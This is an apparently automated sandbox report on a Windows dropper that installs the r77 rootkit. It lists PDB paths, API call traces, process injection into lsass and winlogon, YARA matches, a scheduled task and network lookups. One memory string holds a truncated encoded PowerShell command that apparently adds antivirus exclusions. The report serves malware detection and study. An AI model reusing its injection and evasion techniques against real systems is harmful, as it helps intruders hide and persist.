Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\Install.pdb source: 34432.exe, 00000004.00000002.371180159.000000001702D000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, nslookup.exe, 00000016.00000000.330232590.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000000.329876550.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\r77-x86.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\InstallService64.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.463366324.000002C8902E9000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe
Source: Binary string: x64.pdb source: svchost.exe
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\InstallService32.pdb source: powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\InstallStager\obj\x64\Release\InstallStager.pdb source: 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356818562.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356782565.0000000003991000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.468321947.000002C8EBC93000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: N\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000002.225232923.0000000000113000.00000004.00000010.00020000.00000000.sdmp, ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000003.224694291.0000000002672000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source: Binary string: RYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C49
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_00406873 FindFirstFileW,FindClose,1_2_00406873
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140006E1C FindFirstFileExW,22_2_0000000140006E1C
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_00000001400073C8 FindFirstFileExW,39_2_00000001400073C8
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD0D0E4 FindFirstFileExW,42_2_000001AFDDD0D0E4
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BBD0E4 FindFirstFileExW,44_2_00000240B2BBD0E4
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0D0E4 FindFirstFileExW,47_2_000001CAF3D0D0E4
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4D0E4 FindFirstFileExW,49_2_000001B8BFF4D0E4

Networking

barindex
Uses nslookup.exe to query domains
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exeJump to behavior
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
Source: powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData0I
Source: powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryux
Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: powershell.exe, 00000008.00000002.303519748.000001FF69E80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.467492973.000002C8EBA50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mp
Source: powershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mpowershell-EncodedCommandQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHM
Source: AppLaunch.exe, 00000005.00000002.512763531.0000000006D47000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
Source: AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com4Uk
Source: Install.exe, 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Install.exe, 00000001.00000000.217633196.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.288800846.000001FF51E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.430121118.000002C880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.477975029.00000283A06B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.codeplex.com/DotNetZip
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.298759051.000001FF53502000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.299698983.000001FF5367C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.300217713.000001FF53864000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.493191066.00000283A1A2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.422394060.00000283A2335000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.423315665.00000283A242E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknownDNS traffic detected: queries for: ip-api.com
Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004056DE

System Summary

barindex
Very long command line found
Source: unknownProcess created: Commandline size = 2585
Source: unknownProcess created: Commandline size = 2578
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040755C1_2_0040755C
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_00406D851_2_00406D85
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E401C9B4_2_00007FFF7E401C9B
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E405C204_2_00007FFF7E405C20
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E401CCC4_2_00007FFF7E401CCC
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E401D604_2_00007FFF7E401D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0532148E5_2_0532148E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05327D905_2_05327D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05321DC15_2_05321DC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0532DF005_2_0532DF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0532BFA05_2_0532BFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0532C8705_2_0532C870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_053208685_2_05320868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05320B485_2_05320B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_053215875_2_05321587
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_053220F85_2_053220F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_0532BC585_2_0532BC58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05321E715_2_05321E71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05320B395_2_05320B39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05320B825_2_05320B82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_05327A385_2_05327A38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_094175605_2_09417560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 5_2_094175705_2_09417570
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E3F19588_2_00007FFF7E3F1958
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E3F19B88_2_00007FFF7E3F19B8
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014000100022_2_0000000140001000
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_00000001400011D022_2_00000001400011D0
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140006C1022_2_0000000140006C10
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014000509822_2_0000000140005098
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140006E1C22_2_0000000140006E1C
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014000AABC22_2_000000014000AABC
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014000CAD822_2_000000014000CAD8
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F464030_2_00007FFF7E3F4640
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F1C9B30_2_00007FFF7E3F1C9B
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F1CCC30_2_00007FFF7E3F1CCC
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F1D6030_2_00007FFF7E3F1D60
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E401C9B33_2_00007FFF7E401C9B
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E401CCC33_2_00007FFF7E401CCC
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E401D6033_2_00007FFF7E401D60
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000100039_2_0000000140001000
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000142039_2_0000000140001420
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000143039_2_0000000140001430
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000558C39_2_000000014000558C
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_00000001400071BC39_2_00000001400071BC
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000B2CC39_2_000000014000B2CC
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000D2E839_2_000000014000D2E8
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_00000001400073C839_2_00000001400073C8
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCDC4E442_2_000001AFDDCDC4E4
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCE241842_2_000001AFDDCE2418
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCD080042_2_000001AFDDCD0800
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCE040042_2_000001AFDDCE0400
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCDC2D842_2_000001AFDDCDC2D8
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCD166042_2_000001AFDDCD1660
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD0140042_2_000001AFDDD01400
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD0D0E442_2_000001AFDDD0D0E4
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD1301842_2_000001AFDDD13018
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD1100042_2_000001AFDDD11000
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD0CED842_2_000001AFDDD0CED8
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD0226042_2_000001AFDDD02260
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B8C4E444_2_00000240B2B8C4E4
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B8C2D844_2_00000240B2B8C2D8
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B8166044_2_00000240B2B81660
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B9241844_2_00000240B2B92418
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B8080044_2_00000240B2B80800
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B9040044_2_00000240B2B90400
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BBD0E444_2_00000240B2BBD0E4
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BBCED844_2_00000240B2BBCED8
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BB226044_2_00000240B2BB2260
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BC301844_2_00000240B2BC3018
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BB140044_2_00000240B2BB1400
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BC100044_2_00000240B2BC1000
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CE241847_2_000001CAF3CE2418
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CE040047_2_000001CAF3CE0400
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CD080047_2_000001CAF3CD0800
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CDC2D847_2_000001CAF3CDC2D8
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CD166047_2_000001CAF3CD1660
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CDC4E447_2_000001CAF3CDC4E4
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0140047_2_000001CAF3D01400
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0226047_2_000001CAF3D02260
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0D0E447_2_000001CAF3D0D0E4
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D1301847_2_000001CAF3D13018
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D1100047_2_000001CAF3D11000
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0CED847_2_000001CAF3D0CED8
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF1166049_2_000001B8BFF11660
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF1C4E449_2_000001B8BFF1C4E4
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF2241849_2_000001B8BFF22418
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF1080049_2_000001B8BFF10800
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF2040049_2_000001B8BFF20400
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF1C2D849_2_000001B8BFF1C2D8
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4140049_2_000001B8BFF41400
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4226049_2_000001B8BFF42260
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4D0E449_2_000001B8BFF4D0E4
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF5301849_2_000001B8BFF53018
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF5100049_2_000001B8BFF51000
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4CED849_2_000001B8BFF4CED8
Source: Install.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Install.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 33.2.chrome.exe.fa0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 30.0.chrome.exe.20000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 30.2.chrome.exe.20000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 4.0.34432.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 4.2.34432.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 33.0.chrome.exe.fa0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: C:\Users\user\AppData\Roaming\34432.exe, type: DROPPEDMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe, type: DROPPEDMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_oz5sx3tu.kvs.ps1
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D
Source: C:\Windows\System32\nslookup.exeFile created: C:\Windows\Tasks\nslooksvc32.job
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001420 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,LocalFree,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,GetModuleHandleA,GetProcAddress,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,FindCloseChangeNotification,CloseHandle,39_2_0000000140001420
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001430 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,GetModuleHandleA,GetProcAddress,NtCreateThreadEx,CloseHandle,FindCloseChangeNotification,CloseHandle,39_2_0000000140001430
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD03120 NtEnumerateValueKey,NtEnumerateValueKey,42_2_000001AFDDD03120
Source: chrome.exe.4.drStatic PE information: No import functions for PE file found
Source: 34432.exe.1.drStatic PE information: No import functions for PE file found
